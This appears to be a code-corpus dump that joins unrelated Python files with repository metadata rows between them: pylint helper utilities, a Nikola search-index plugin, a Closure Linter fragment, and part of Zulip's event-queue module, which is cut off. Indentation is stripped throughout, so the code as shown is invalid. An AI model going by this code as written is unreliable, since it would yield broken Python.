"""Whether the given error should be reported.
Returns:
True for all errors except missing documentation errors and disabled
errors. For missing documentation, it returns the value of the
jsdoc flag.
"""
global disabled_error_nums
if disabled_error_nums is None:
disabled_error_nums = []
if FLAGS.disable:
for error_str in FLAGS.disable:
error_num = 0
try:
error_num = int(error_str)
except ValueError:
pass
disabled_error_nums.append(error_num)
return ((FLAGS.jsdoc or error not in (
errors.MISSING_PARAMETER_DOCUMENTATION,
errors.MISSING_RETURN_DOCUMENTATION,
errors.MISSING_MEMBER_DOCUMENTATION,
errors.MISSING_PRIVATE,
errors.MISSING_JSDOC_TAG_THIS)) and
(not FLAGS.disable or error not in disabled_error_nums))
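# A minimal usage sketch, assuming gflags has already parsed the command
# line. Note that disabled_error_nums is computed once and cached on the
# first call:
#
#     FLAGS.jsdoc = False
#     ShouldReportError(errors.MISSING_PARAMETER_DOCUMENTATION)  # -> False
#     # Errors outside the JsDoc group and not listed in --disable -> True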
| bsd-3-clause | -1,315,710,274,127,656,000 | 30.611111 | 75 | 0.690246 | false |
ClovisIRex/Snake-django | env/lib/python3.6/site-packages/pylint/checkers/utils.py | 3 | 29753 | # Copyright (c) 2006-2007, 2009-2014 LOGILAB S.A. (Paris, FRANCE) <contact@logilab.fr>
# Copyright (c) 2012-2014 Google, Inc.
# Copyright (c) 2013-2016 Claudiu Popa <pcmanticore@gmail.com>
# Copyright (c) 2015 Radu Ciorba <radu@devrandom.ro>
# Copyright (c) 2015 Dmitry Pribysh <dmand@yandex.ru>
# Copyright (c) 2016 Ashley Whetter <ashley@awhetter.co.uk>
# Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/master/COPYING
# pylint: disable=W0611
"""some functions that may be useful for various checkers
"""
import collections
import functools
try:
from functools import singledispatch as singledispatch
except ImportError:
# pylint: disable=import-error
from singledispatch import singledispatch as singledispatch
try:
from functools import lru_cache
except ImportError:
from backports.functools_lru_cache import lru_cache
import itertools
import re
import sys
import string
import warnings
import six
from six.moves import map, builtins # pylint: disable=redefined-builtin
import astroid
from astroid import bases as _bases
from astroid import scoped_nodes
BUILTINS_NAME = builtins.__name__
COMP_NODE_TYPES = (astroid.ListComp, astroid.SetComp,
astroid.DictComp, astroid.GeneratorExp)
PY3K = sys.version_info[0] == 3
if not PY3K:
EXCEPTIONS_MODULE = "exceptions"
else:
EXCEPTIONS_MODULE = "builtins"
ABC_METHODS = set(('abc.abstractproperty', 'abc.abstractmethod',
'abc.abstractclassmethod', 'abc.abstractstaticmethod'))
ITER_METHOD = '__iter__'
NEXT_METHOD = 'next' if six.PY2 else '__next__'
GETITEM_METHOD = '__getitem__'
SETITEM_METHOD = '__setitem__'
DELITEM_METHOD = '__delitem__'
CONTAINS_METHOD = '__contains__'
KEYS_METHOD = 'keys'
# Dictionary which maps the number of expected parameters a
# special method can have to a set of special methods.
# The following keys are used to denote the parameters restrictions:
#
# * None: variable number of parameters
# * number: exactly that number of parameters
# * tuple: this are the odd ones. Basically it means that the function
# can work with any number of arguments from that tuple,
# although it's best to implement it in order to accept
# all of them.
_SPECIAL_METHODS_PARAMS = {
None: ('__new__', '__init__', '__call__'),
0: ('__del__', '__repr__', '__str__', '__bytes__', '__hash__', '__bool__',
'__dir__', '__len__', '__length_hint__', '__iter__', '__reversed__',
'__neg__', '__pos__', '__abs__', '__invert__', '__complex__', '__int__',
'__float__', '__neg__', '__pos__', '__abs__', '__complex__', '__int__',
'__float__', '__index__', '__enter__', '__aenter__', '__getnewargs_ex__',
'__getnewargs__', '__getstate__', '__reduce__', '__copy__',
'__unicode__', '__nonzero__', '__await__', '__aiter__', '__anext__',
'__fspath__'),
1: ('__format__', '__lt__', '__le__', '__eq__', '__ne__', '__gt__',
'__ge__', '__getattr__', '__getattribute__', '__delattr__',
'__delete__', '__instancecheck__', '__subclasscheck__',
'__getitem__', '__missing__', '__delitem__', '__contains__',
'__add__', '__sub__', '__mul__', '__truediv__', '__floordiv__',
'__mod__', '__divmod__', '__lshift__', '__rshift__', '__and__',
'__xor__', '__or__', '__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rmod__', '__rdivmod__', '__rpow__', '__rlshift__', '__rrshift__',
'__rand__', '__rxor__', '__ror__', '__iadd__', '__isub__', '__imul__',
'__itruediv__', '__ifloordiv__', '__imod__', '__ilshift__',
'__irshift__', '__iand__', '__ixor__', '__ior__', '__ipow__',
'__setstate__', '__reduce_ex__', '__deepcopy__', '__cmp__',
'__matmul__', '__rmatmul__', '__div__'),
2: ('__setattr__', '__get__', '__set__', '__setitem__'),
3: ('__exit__', '__aexit__'),
(0, 1): ('__round__', ),
}
SPECIAL_METHODS_PARAMS = {
name: params
for params, methods in _SPECIAL_METHODS_PARAMS.items()
for name in methods
}
PYMETHODS = set(SPECIAL_METHODS_PARAMS)
class NoSuchArgumentError(Exception):
pass
def is_inside_except(node):
"""Returns true if node is inside the name of an except handler."""
current = node
while current and not isinstance(current.parent, astroid.ExceptHandler):
current = current.parent
return current and current is current.parent.name
def get_all_elements(node):
"""Recursively returns all atoms in nested lists and tuples."""
if isinstance(node, (astroid.Tuple, astroid.List)):
for child in node.elts:
for e in get_all_elements(child):
yield e
else:
yield node
def clobber_in_except(node):
"""Checks if an assignment node in an except handler clobbers an existing
variable.
Returns (True, args for W0623) if assignment clobbers an existing variable,
(False, None) otherwise.
"""
if isinstance(node, astroid.AssignAttr):
return (True, (node.attrname, 'object %r' % (node.expr.as_string(),)))
elif isinstance(node, astroid.AssignName):
name = node.name
if is_builtin(name):
return (True, (name, 'builtins'))
else:
stmts = node.lookup(name)[1]
if (stmts and not isinstance(stmts[0].assign_type(),
(astroid.Assign, astroid.AugAssign,
astroid.ExceptHandler))):
return (True, (name, 'outer scope (line %s)' % stmts[0].fromlineno))
return (False, None)
def is_super(node):
"""return True if the node is referencing the "super" builtin function
"""
if getattr(node, 'name', None) == 'super' and \
node.root().name == BUILTINS_NAME:
return True
return False
def is_error(node):
"""return true if the function does nothing but raising an exception"""
for child_node in node.get_children():
if isinstance(child_node, astroid.Raise):
return True
return False
def is_raising(body):
"""return true if the given statement node raise an exception"""
for node in body:
if isinstance(node, astroid.Raise):
return True
return False
builtins = builtins.__dict__.copy()
SPECIAL_BUILTINS = ('__builtins__',) # '__path__', '__file__')
def is_builtin_object(node):
"""Returns True if the given node is an object from the __builtin__ module."""
return node and node.root().name == BUILTINS_NAME
def is_builtin(name):
"""return true if <name> could be considered as a builtin defined by python
"""
return name in builtins or name in SPECIAL_BUILTINS
def is_defined_before(var_node):
"""return True if the variable node is defined by a parent node (list,
set, dict, or generator comprehension, lambda) or in a previous sibling
node on the same line (statement_defining ; statement_using)
"""
varname = var_node.name
_node = var_node.parent
while _node:
if isinstance(_node, COMP_NODE_TYPES):
for ass_node in _node.nodes_of_class(astroid.AssignName):
if ass_node.name == varname:
return True
elif isinstance(_node, astroid.For):
for ass_node in _node.target.nodes_of_class(astroid.AssignName):
if ass_node.name == varname:
return True
elif isinstance(_node, astroid.With):
for expr, ids in _node.items:
if expr.parent_of(var_node):
break
if (ids and
isinstance(ids, astroid.AssignName) and
ids.name == varname):
return True
elif isinstance(_node, (astroid.Lambda, astroid.FunctionDef)):
if _node.args.is_argument(varname):
# If the name is found inside a default value
# of a function, then let the search continue
# in the parent's tree.
if _node.args.parent_of(var_node):
try:
_node.args.default_value(varname)
_node = _node.parent
continue
except astroid.NoDefault:
pass
return True
if getattr(_node, 'name', None) == varname:
return True
break
elif isinstance(_node, astroid.ExceptHandler):
if isinstance(_node.name, astroid.AssignName):
ass_node = _node.name
if ass_node.name == varname:
return True
_node = _node.parent
    # possibly multiple statements on the same line using a semicolon separator
stmt = var_node.statement()
_node = stmt.previous_sibling()
lineno = stmt.fromlineno
while _node and _node.fromlineno == lineno:
for ass_node in _node.nodes_of_class(astroid.AssignName):
if ass_node.name == varname:
return True
for imp_node in _node.nodes_of_class((astroid.ImportFrom, astroid.Import)):
if varname in [name[1] or name[0] for name in imp_node.names]:
return True
_node = _node.previous_sibling()
return False
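# A minimal sketch of the same-line sibling case handled above (requires
# astroid; the snippet is made up):
#
#     tree = astroid.parse("value = 1; use(value)")
#     name_node = tree.body[1].value.args[0]  # the Name node for `value`
#     is_defined_before(name_node)            # -> True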
def is_func_default(node):
"""return true if the given Name node is used in function default argument's
value
"""
parent = node.scope()
if isinstance(parent, astroid.FunctionDef):
for default_node in parent.args.defaults:
for default_name_node in default_node.nodes_of_class(astroid.Name):
if default_name_node is node:
return True
return False
def is_func_decorator(node):
"""return true if the name is used in function decorator"""
parent = node.parent
while parent is not None:
if isinstance(parent, astroid.Decorators):
return True
if (parent.is_statement or
isinstance(parent, (astroid.Lambda,
scoped_nodes.ComprehensionScope,
scoped_nodes.ListComp))):
break
parent = parent.parent
return False
def is_ancestor_name(frame, node):
"""return True if `frame` is a astroid.Class node with `node` in the
subtree of its bases attribute
"""
try:
bases = frame.bases
except AttributeError:
return False
for base in bases:
if node in base.nodes_of_class(astroid.Name):
return True
return False
def assign_parent(node):
"""return the higher parent which is not an AssName, Tuple or List node
"""
while node and isinstance(node, (astroid.AssignName,
astroid.Tuple,
astroid.List)):
node = node.parent
return node
def overrides_a_method(class_node, name):
"""return True if <name> is a method overridden from an ancestor"""
for ancestor in class_node.ancestors():
if name in ancestor and isinstance(ancestor[name], astroid.FunctionDef):
return True
return False
def check_messages(*messages):
"""decorator to store messages that are handled by a checker method"""
def store_messages(func):
func.checks_msgs = messages
return func
return store_messages
class IncompleteFormatString(Exception):
"""A format string ended in the middle of a format specifier."""
pass
class UnsupportedFormatCharacter(Exception):
"""A format character in a format string is not one of the supported
format characters."""
def __init__(self, index):
Exception.__init__(self, index)
self.index = index
def parse_format_string(format_string):
"""Parses a format string, returning a tuple of (keys, num_args), where keys
is the set of mapping keys in the format string, and num_args is the number
of arguments required by the format string. Raises
IncompleteFormatString or UnsupportedFormatCharacter if a
parse error occurs."""
keys = set()
num_args = 0
def next_char(i):
i += 1
if i == len(format_string):
raise IncompleteFormatString
return (i, format_string[i])
i = 0
while i < len(format_string):
char = format_string[i]
if char == '%':
i, char = next_char(i)
# Parse the mapping key (optional).
key = None
if char == '(':
depth = 1
i, char = next_char(i)
key_start = i
while depth != 0:
if char == '(':
depth += 1
elif char == ')':
depth -= 1
i, char = next_char(i)
key_end = i - 1
key = format_string[key_start:key_end]
# Parse the conversion flags (optional).
while char in '#0- +':
i, char = next_char(i)
# Parse the minimum field width (optional).
if char == '*':
num_args += 1
i, char = next_char(i)
else:
while char in string.digits:
i, char = next_char(i)
# Parse the precision (optional).
if char == '.':
i, char = next_char(i)
if char == '*':
num_args += 1
i, char = next_char(i)
else:
while char in string.digits:
i, char = next_char(i)
# Parse the length modifier (optional).
if char in 'hlL':
i, char = next_char(i)
# Parse the conversion type (mandatory).
if PY3K:
flags = 'diouxXeEfFgGcrs%a'
else:
flags = 'diouxXeEfFgGcrs%'
if char not in flags:
raise UnsupportedFormatCharacter(i)
if key:
keys.add(key)
elif char != '%':
num_args += 1
i += 1
return keys, num_args
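# A minimal usage sketch:
#
#     parse_format_string('%s: %d')    # -> (set(), 2)
#     parse_format_string('%(name)s')  # -> (set(['name']), 0)
#     parse_format_string('%(name)')   # raises IncompleteFormatString
#     parse_format_string('%z')        # raises UnsupportedFormatCharacter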
def is_attr_protected(attrname):
"""return True if attribute name is protected (start with _ and some other
details), False otherwise.
"""
return attrname[0] == '_' and attrname != '_' and not (
attrname.startswith('__') and attrname.endswith('__'))
def node_frame_class(node):
"""return klass node for a method node (or a staticmethod or a
    classmethod), return None otherwise
"""
klass = node.frame()
while klass is not None and not isinstance(klass, astroid.ClassDef):
if klass.parent is None:
klass = None
else:
klass = klass.parent.frame()
return klass
def is_attr_private(attrname):
"""Check that attribute name is private (at least two leading underscores,
at most one trailing underscore)
"""
regex = re.compile('^_{2,}.*[^_]+_?$')
return regex.match(attrname)
def get_argument_from_call(callfunc_node, position=None, keyword=None):
"""Returns the specified argument from a function call.
:param astroid.Call callfunc_node: Node representing a function call to check.
:param int position: position of the argument.
:param str keyword: the keyword of the argument.
:returns: The node representing the argument, None if the argument is not found.
:rtype: astroid.Name
:raises ValueError: if both position and keyword are None.
:raises NoSuchArgumentError: if no argument at the provided position or with
the provided keyword.
"""
if position is None and keyword is None:
raise ValueError('Must specify at least one of: position or keyword.')
if position is not None:
try:
return callfunc_node.args[position]
except IndexError:
pass
if keyword and callfunc_node.keywords:
for arg in callfunc_node.keywords:
if arg.arg == keyword:
return arg.value
raise NoSuchArgumentError
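# A minimal usage sketch (requires astroid; the call below is made up):
#
#     call = astroid.extract_node("foo(1, bar=2)")
#     get_argument_from_call(call, position=0)     # -> Const node for 1
#     get_argument_from_call(call, keyword='bar')  # -> Const node for 2
#     get_argument_from_call(call, position=5)     # raises NoSuchArgumentError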
def inherit_from_std_ex(node):
"""
    Return true if the given class node is a subclass of
exceptions.Exception.
"""
if node.name in ('Exception', 'BaseException') \
and node.root().name == EXCEPTIONS_MODULE:
return True
return any(inherit_from_std_ex(parent)
for parent in node.ancestors(recurs=True))
def error_of_type(handler, error_type):
"""
Check if the given exception handler catches
the given error_type.
The *handler* parameter is a node, representing an ExceptHandler node.
The *error_type* can be an exception, such as AttributeError,
the name of an exception, or it can be a tuple of errors.
The function will return True if the handler catches any of the
given errors.
"""
def stringify_error(error):
if not isinstance(error, six.string_types):
return error.__name__
return error
if not isinstance(error_type, tuple):
error_type = (error_type, )
expected_errors = {stringify_error(error) for error in error_type}
if not handler.type:
# bare except. While this indeed catches anything, if the desired errors
# aren't specified directly, then we just ignore it.
return False
return handler.catch(expected_errors)
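# A minimal usage sketch (requires astroid):
#
#     module = astroid.parse('''
#     try:
#         pass
#     except (OSError, KeyError):
#         pass
#     ''')
#     handler = module.body[0].handlers[0]
#     error_of_type(handler, KeyError)                  # -> True
#     error_of_type(handler, (ValueError, 'KeyError'))  # -> True
#     error_of_type(handler, ValueError)                # -> False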
def decorated_with_property(node):
""" Detect if the given function node is decorated with a property. """
if not node.decorators:
return False
for decorator in node.decorators.nodes:
if not isinstance(decorator, astroid.Name):
continue
try:
if _is_property_decorator(decorator):
return True
except astroid.InferenceError:
pass
return False
def _is_property_decorator(decorator):
for infered in decorator.infer():
if isinstance(infered, astroid.ClassDef):
if infered.root().name == BUILTINS_NAME and infered.name == 'property':
return True
for ancestor in infered.ancestors():
if ancestor.name == 'property' and ancestor.root().name == BUILTINS_NAME:
return True
def decorated_with(func, qnames):
"""Determine if the `func` node has a decorator with the qualified name `qname`."""
decorators = func.decorators.nodes if func.decorators else []
for decorator_node in decorators:
try:
if any(i is not None and i.qname() in qnames for i in decorator_node.infer()):
return True
except astroid.InferenceError:
continue
return False
@lru_cache(maxsize=1024)
def unimplemented_abstract_methods(node, is_abstract_cb=None):
"""
Get the unimplemented abstract methods for the given *node*.
A method can be considered abstract if the callback *is_abstract_cb*
    returns a ``True`` value. The default check verifies that
    a method is decorated with one of the ``abc`` abstract decorators.
The function will work only for new-style classes. For old-style
classes, it will simply return an empty dictionary.
For the rest of them, it will return a dictionary of abstract method
names and their inferred objects.
"""
if is_abstract_cb is None:
is_abstract_cb = functools.partial(
decorated_with, qnames=ABC_METHODS)
visited = {}
try:
mro = reversed(node.mro())
except NotImplementedError:
# Old style class, it will not have a mro.
return {}
except astroid.ResolveError:
        # Probably an inconsistent hierarchy; don't try
# to figure this out here.
return {}
for ancestor in mro:
for obj in ancestor.values():
infered = obj
if isinstance(obj, astroid.AssignName):
infered = safe_infer(obj)
if not infered:
# Might be an abstract function,
# but since we don't have enough information
                    # to make that decision, we take
# the *safe* decision instead.
if obj.name in visited:
del visited[obj.name]
continue
if not isinstance(infered, astroid.FunctionDef):
if obj.name in visited:
del visited[obj.name]
if isinstance(infered, astroid.FunctionDef):
# It's critical to use the original name,
# since after inferring, an object can be something
# else than expected, as in the case of the
# following assignment.
#
# class A:
# def keys(self): pass
# __iter__ = keys
abstract = is_abstract_cb(infered)
if abstract:
visited[obj.name] = infered
elif not abstract and obj.name in visited:
del visited[obj.name]
return visited
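# A minimal sketch (requires astroid; Python 2 metaclass syntax to match
# this codebase):
#
#     klass = astroid.extract_node('''
#     import abc
#     class Base(object):
#         __metaclass__ = abc.ABCMeta
#         @abc.abstractmethod
#         def run(self): pass
#     class Child(Base):  #@
#         pass
#     ''')
#     unimplemented_abstract_methods(klass)  # -> {'run': <FunctionDef run>}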
def _import_node_context(node):
current = node
ignores = (astroid.ExceptHandler, astroid.TryExcept)
while current and not isinstance(current.parent, ignores):
current = current.parent
if current and isinstance(current.parent, ignores):
return current.parent
return None
def is_from_fallback_block(node):
"""Check if the given node is from a fallback import block."""
context = _import_node_context(node)
if not context:
return False
if isinstance(context, astroid.ExceptHandler):
other_body = context.parent.body
handlers = context.parent.handlers
else:
other_body = itertools.chain.from_iterable(
handler.body for handler in context.handlers)
handlers = context.handlers
has_fallback_imports = any(isinstance(import_node, (astroid.ImportFrom, astroid.Import))
for import_node in other_body)
ignores_import_error = _except_handlers_ignores_exception(handlers, ImportError)
return ignores_import_error or has_fallback_imports
def _except_handlers_ignores_exception(handlers, exception):
func = functools.partial(error_of_type,
error_type=(exception, ))
return any(map(func, handlers))
def node_ignores_exception(node, exception):
"""Check if the node is in a TryExcept which handles the given exception."""
current = node
ignores = (astroid.ExceptHandler, astroid.TryExcept)
while current and not isinstance(current.parent, ignores):
current = current.parent
if current and isinstance(current.parent, astroid.TryExcept):
return _except_handlers_ignores_exception(current.parent.handlers, exception)
return False
def class_is_abstract(node):
"""return true if the given class node should be considered as an abstract
class
"""
for method in node.methods():
if method.parent.frame() is node:
if method.is_abstract(pass_is_abstract=False):
return True
return False
def _supports_protocol_method(value, attr):
try:
attributes = value.getattr(attr)
except astroid.NotFoundError:
return False
first = attributes[0]
if isinstance(first, astroid.AssignName):
if isinstance(first.parent.value, astroid.Const):
return False
return True
def is_comprehension(node):
comprehensions = (astroid.ListComp,
astroid.SetComp,
astroid.DictComp,
astroid.GeneratorExp)
return isinstance(node, comprehensions)
def _supports_mapping_protocol(value):
return (
_supports_protocol_method(value, GETITEM_METHOD)
and _supports_protocol_method(value, KEYS_METHOD)
)
def _supports_membership_test_protocol(value):
return _supports_protocol_method(value, CONTAINS_METHOD)
def _supports_iteration_protocol(value):
return (
_supports_protocol_method(value, ITER_METHOD)
or _supports_protocol_method(value, GETITEM_METHOD)
)
def _supports_getitem_protocol(value):
return _supports_protocol_method(value, GETITEM_METHOD)
def _supports_setitem_protocol(value):
return _supports_protocol_method(value, SETITEM_METHOD)
def _supports_delitem_protocol(value):
return _supports_protocol_method(value, DELITEM_METHOD)
def _is_abstract_class_name(name):
lname = name.lower()
is_mixin = lname.endswith('mixin')
is_abstract = lname.startswith('abstract')
is_base = lname.startswith('base') or lname.endswith('base')
return is_mixin or is_abstract or is_base
def is_inside_abstract_class(node):
while node is not None:
if isinstance(node, astroid.ClassDef):
if class_is_abstract(node):
return True
name = getattr(node, 'name', None)
if name is not None and _is_abstract_class_name(name):
return True
node = node.parent
return False
def _supports_protocol(value, protocol_callback):
if isinstance(value, astroid.ClassDef):
if not has_known_bases(value):
return True
# classobj can only be iterable if it has an iterable metaclass
meta = value.metaclass()
if meta is not None:
if protocol_callback(meta):
return True
if isinstance(value, astroid.BaseInstance):
if not has_known_bases(value):
return True
if protocol_callback(value):
return True
# TODO: this is not needed in astroid 2.0, where we can
# check the type using a virtual base class instead.
if (isinstance(value, _bases.Proxy)
and isinstance(value._proxied, astroid.BaseInstance)
and has_known_bases(value._proxied)):
value = value._proxied
return protocol_callback(value)
return False
def is_iterable(value):
return _supports_protocol(value, _supports_iteration_protocol)
def is_mapping(value):
return _supports_protocol(value, _supports_mapping_protocol)
def supports_membership_test(value):
supported = _supports_protocol(value, _supports_membership_test_protocol)
return supported or is_iterable(value)
def supports_getitem(value):
return _supports_protocol(value, _supports_getitem_protocol)
def supports_setitem(value):
return _supports_protocol(value, _supports_setitem_protocol)
def supports_delitem(value):
return _supports_protocol(value, _supports_delitem_protocol)
# TODO(cpopa): deprecate these or leave them as aliases?
@lru_cache(maxsize=1024)
def safe_infer(node, context=None):
"""Return the inferred value for the given node.
Return None if inference failed or if there is some ambiguity (more than
one node has been inferred).
"""
try:
inferit = node.infer(context=context)
value = next(inferit)
except astroid.InferenceError:
return
try:
next(inferit)
return # None if there is ambiguity on the inferred node
except astroid.InferenceError:
return # there is some kind of ambiguity
except StopIteration:
return value
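# A minimal usage sketch (requires astroid):
#
#     safe_infer(astroid.extract_node("1 + 2"))      # -> Const node, value 3
#     safe_infer(astroid.extract_node("undefined"))  # -> None (inference fails)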
def has_known_bases(klass, context=None):
"""Return true if all base classes of a class could be inferred."""
try:
return klass._all_bases_known
except AttributeError:
pass
for base in klass.bases:
result = safe_infer(base, context=context)
# TODO: check for A->B->A->B pattern in class structure too?
if (not isinstance(result, astroid.ClassDef) or
result is klass or
not has_known_bases(result, context=context)):
klass._all_bases_known = False
return False
klass._all_bases_known = True
return True
def is_none(node):
return (node is None or
(isinstance(node, astroid.Const) and node.value is None) or
(isinstance(node, astroid.Name) and node.name == 'None')
)
def node_type(node):
"""Return the inferred type for `node`
If there is more than one possible type, or if inferred type is YES or None,
return None
"""
# check there is only one possible type for the assign node. Else we
# don't handle it for now
types = set()
try:
for var_type in node.infer():
if var_type == astroid.YES or is_none(var_type):
continue
types.add(var_type)
if len(types) > 1:
return
except astroid.InferenceError:
return
return types.pop() if types else None
def is_registered_in_singledispatch_function(node):
"""Check if the given function node is a singledispatch function."""
singledispatch_qnames = (
'functools.singledispatch',
'singledispatch.singledispatch'
)
if not isinstance(node, astroid.FunctionDef):
return False
decorators = node.decorators.nodes if node.decorators else []
for decorator in decorators:
# func.register are function calls
if not isinstance(decorator, astroid.Call):
continue
func = decorator.func
if not isinstance(func, astroid.Attribute) or func.attrname != 'register':
continue
try:
func_def = next(func.expr.infer())
except astroid.InferenceError:
continue
if isinstance(func_def, astroid.FunctionDef):
return decorated_with(func_def, singledispatch_qnames)
return False
| mit | 5,545,447,352,638,537,000 | 33.596512 | 92 | 0.601049 | false |
getnikola/plugins | v7/localsearch/localsearch/__init__.py | 1 | 4350 | # -*- coding: utf-8 -*-
# Copyright © 2012-2014 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from __future__ import unicode_literals
import codecs
import json
import os
from nikola.plugin_categories import LateTask
from nikola.utils import apply_filters, config_changed, copy_tree, makedirs
# This is what we need to produce:
# var tipuesearch = {"pages": [
# {"title": "Tipue Search, a jQuery site search engine", "text": "Tipue
# Search is a site search engine jQuery plugin. It's free for both commercial and
# non-commercial use and released under the MIT License. Tipue Search includes
# features such as word stemming and word replacement.", "tags": "JavaScript",
# "loc": "http://www.tipue.com/search"},
# {"title": "Tipue Search demo", "text": "Tipue Search demo. Tipue Search is
# a site search engine jQuery plugin.", "tags": "JavaScript", "loc":
# "http://www.tipue.com/search/demo"},
# {"title": "About Tipue", "text": "Tipue is a small web development/design
# studio based in North London. We've been around for over a decade.", "tags": "",
# "loc": "http://www.tipue.com/about"}
# ]};
class Tipue(LateTask):
"""Render the blog posts as JSON data."""
name = "localsearch"
def gen_tasks(self):
self.site.scan_posts()
kw = {
"translations": self.site.config['TRANSLATIONS'],
"output_folder": self.site.config['OUTPUT_FOLDER'],
"filters": self.site.config['FILTERS'],
"timeline": self.site.timeline,
}
posts = self.site.timeline[:]
dst_path = os.path.join(kw["output_folder"], "assets", "js",
"tipuesearch_content.js")
def save_data():
pages = []
for lang in kw["translations"]:
for post in posts:
# Don't index drafts (Issue #387)
if post.is_draft or post.is_private or post.publish_later:
continue
text = post.text(lang, strip_html=True)
text = text.replace('^', '')
data = {}
data["title"] = post.title(lang)
data["text"] = text
data["tags"] = ",".join(post.tags)
data["url"] = post.permalink(lang, absolute=True)
pages.append(data)
output = json.dumps({"pages": pages}, indent=2)
output = 'var tipuesearch = ' + output + ';'
makedirs(os.path.dirname(dst_path))
with codecs.open(dst_path, "wb+", "utf8") as fd:
fd.write(output)
task = {
"basename": str(self.name),
"name": dst_path,
"targets": [dst_path],
"actions": [(save_data, [])],
'uptodate': [config_changed(kw)],
'calc_dep': ['_scan_locs:sitemap']
}
yield apply_filters(task, kw['filters'])
# Copy all the assets to the right places
asset_folder = os.path.join(os.path.dirname(__file__), "files")
for task in copy_tree(asset_folder, kw["output_folder"]):
task["basename"] = str(self.name)
yield apply_filters(task, kw['filters'])
| mit | -2,557,237,027,577,164,000 | 40.028302 | 90 | 0.601977 | false |
udxxabp/zulip | zerver/lib/event_queue.py | 115 | 29293 | from __future__ import absolute_import
from django.conf import settings
from django.utils.timezone import now
from collections import deque
import datetime
import os
import time
import socket
import logging
import ujson
import requests
import cPickle as pickle
import atexit
import sys
import signal
import tornado
import random
import traceback
from zerver.lib.cache import cache_get_many, message_cache_key, \
user_profile_by_id_cache_key, cache_save_user_profile
from zerver.lib.cache_helpers import cache_with_key
from zerver.lib.utils import statsd
from zerver.middleware import async_request_restart
from zerver.models import get_client, Message
from zerver.lib.narrow import build_narrow_filter
from zerver.lib.queue import queue_json_publish
from zerver.lib.timestamp import timestamp_to_datetime
import copy
# The idle timeout used to be a week, but we found that in that
# situation, queues from dead browser sessions would grow quite large
# due to the accumulation of message data in those queues.
IDLE_EVENT_QUEUE_TIMEOUT_SECS = 60 * 10
EVENT_QUEUE_GC_FREQ_MSECS = 1000 * 60 * 5
# Capped limit for how long a client can request an event queue
# to live
MAX_QUEUE_TIMEOUT_SECS = 7 * 24 * 60 * 60
# The heartbeats effectively act as a server-side timeout for
# get_events(). The actual timeout value is randomized for each
# client connection based on the below value. We ensure that the
# maximum timeout value is 55 seconds, to deal with crappy home
# wireless routers that kill "inactive" http connections.
HEARTBEAT_MIN_FREQ_SECS = 45
class ClientDescriptor(object):
def __init__(self, user_profile_id, realm_id, event_queue, event_types, client_type,
apply_markdown=True, all_public_streams=False, lifespan_secs=0,
narrow=[]):
# These objects are serialized on shutdown and restored on restart.
# If fields are added or semantics are changed, temporary code must be
# added to load_event_queues() to update the restored objects.
# Additionally, the to_dict and from_dict methods must be updated
self.user_profile_id = user_profile_id
self.realm_id = realm_id
self.current_handler = None
self.event_queue = event_queue
self.queue_timeout = lifespan_secs
self.event_types = event_types
self.last_connection_time = time.time()
self.apply_markdown = apply_markdown
self.all_public_streams = all_public_streams
self.client_type = client_type
self._timeout_handle = None
self.narrow = narrow
self.narrow_filter = build_narrow_filter(narrow)
# Clamp queue_timeout to between minimum and maximum timeouts
self.queue_timeout = max(IDLE_EVENT_QUEUE_TIMEOUT_SECS, min(self.queue_timeout, MAX_QUEUE_TIMEOUT_SECS))
def to_dict(self):
# If you add a new key to this dict, make sure you add appropriate
# migration code in from_dict or load_event_queues to account for
# loading event queues that lack that key.
return dict(user_profile_id=self.user_profile_id,
realm_id=self.realm_id,
event_queue=self.event_queue.to_dict(),
queue_timeout=self.queue_timeout,
event_types=self.event_types,
last_connection_time=self.last_connection_time,
apply_markdown=self.apply_markdown,
all_public_streams=self.all_public_streams,
narrow=self.narrow,
client_type=self.client_type.name)
@classmethod
def from_dict(cls, d):
ret = cls(d['user_profile_id'], d['realm_id'],
EventQueue.from_dict(d['event_queue']), d['event_types'],
get_client(d['client_type']), d['apply_markdown'], d['all_public_streams'],
d['queue_timeout'], d.get('narrow', []))
ret.last_connection_time = d['last_connection_time']
return ret
def prepare_for_pickling(self):
self.current_handler = None
self._timeout_handle = None
def add_event(self, event):
if self.current_handler is not None:
async_request_restart(self.current_handler._request)
self.event_queue.push(event)
self.finish_current_handler()
def finish_current_handler(self):
if self.current_handler is not None:
err_msg = "Got error finishing handler for queue %s" % (self.event_queue.id,)
try:
# We call async_request_restart here in case we are
# being finished without any events (because another
# get_events request has supplanted this request)
async_request_restart(self.current_handler._request)
self.current_handler._request._log_data['extra'] = "[%s/1]" % (self.event_queue.id,)
self.current_handler.zulip_finish(dict(result='success', msg='',
events=self.event_queue.contents(),
queue_id=self.event_queue.id),
self.current_handler._request,
apply_markdown=self.apply_markdown)
except IOError as e:
if e.message != 'Stream is closed':
logging.exception(err_msg)
except AssertionError as e:
if e.message != 'Request closed':
logging.exception(err_msg)
except Exception:
logging.exception(err_msg)
finally:
self.disconnect_handler()
return True
return False
def accepts_event(self, event):
if self.event_types is not None and event["type"] not in self.event_types:
return False
if event["type"] == "message":
return self.narrow_filter(event)
return True
# TODO: Refactor so we don't need this function
def accepts_messages(self):
return self.event_types is None or "message" in self.event_types
def idle(self, now):
if not hasattr(self, 'queue_timeout'):
self.queue_timeout = IDLE_EVENT_QUEUE_TIMEOUT_SECS
return (self.current_handler is None
and now - self.last_connection_time >= self.queue_timeout)
def connect_handler(self, handler):
